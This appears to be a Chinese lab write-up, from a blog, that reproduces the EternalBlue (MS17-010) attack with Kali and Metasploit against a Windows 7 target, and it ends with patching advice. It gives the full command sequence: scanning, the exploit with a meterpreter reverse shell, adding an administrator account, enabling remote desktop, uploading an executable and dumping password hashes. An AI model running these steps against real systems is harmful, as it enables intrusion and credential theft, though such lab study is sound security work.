Windows下永恒之蓝(MS17-010)漏洞的复现分析

一、漏洞简介

1、爆发于17年左右,一种名为WannaCry(永恒之蓝)的电脑勒索病毒,基于SMB协议,利用开放TCP445端口的机器进行攻击,只要机主开机联网,就可通过漏洞来控制主机,植入木马,窃取用户隐私,进行勒索。

2、影响版本:Windows xp,Windows 2003,Windows 7、Windows 8,Windows 2008,Windows 2008 R2、Windows Server 2012等

二、复现环境

攻击机:kali-linux-2021(ip地址192.168.110.3)

靶机:windows7(ip地址192.168.110.133)

三、漏洞复现

    • 确保靶机开启445端口,使用kali自带的nmap对靶机进行扫描

nmap 192.168.110.133

    • 输入命令msfconsole,启动kali自带的msf

3.根据漏洞名称搜索 : search ms17-010

    • 运用辅助模块扫描目标

设置模块:use auxiliary/scanner/smb/smb_ms17_010

查看设置:options

设置目标地址:set rhosts 192.168.110.133

设置好了之后,run或者exploit 进行攻击

绿色的加号为可攻击

    • 设置攻击模块对目标进行攻击

使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue

查看所需设置:options

设置目标地址:set RHOSTS 192.168.110.133

设置目标端口:set RPORT 445(默认)

设置payload:set payload windows/x64/meterpreter/reverse_tcp(默认)

设置本地地址:set LHOST 192.168.110.3(默认)

攻击:run或者exploit

成功建立会话

查看目前权限,为系统权限

使用shell进入命令窗口(输入chcp 65001解决乱码问题)

创建新用户wang 123并加入管理员组

在meterpreter 界面输入 run getgui -e 开启目标靶机的远程桌面

screenshot #可以对靶机屏幕截图

使用upload 上传文件

upload /home/kali/桌面/Server.exe C:\\Windows

其他命令:

sysinfo #查看靶机信息

ipconfig #查看靶机网络配置

ifconfig #查看靶机网络配置

ps #查看靶机正在运行的进程

Hashdump#下载靶机的用户hash

四、漏洞解决方法

  1. 对系统进行升级或打补丁

2.开启防火墙,安装其他杀毒工具

3.关闭相应的端口

  • 4
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值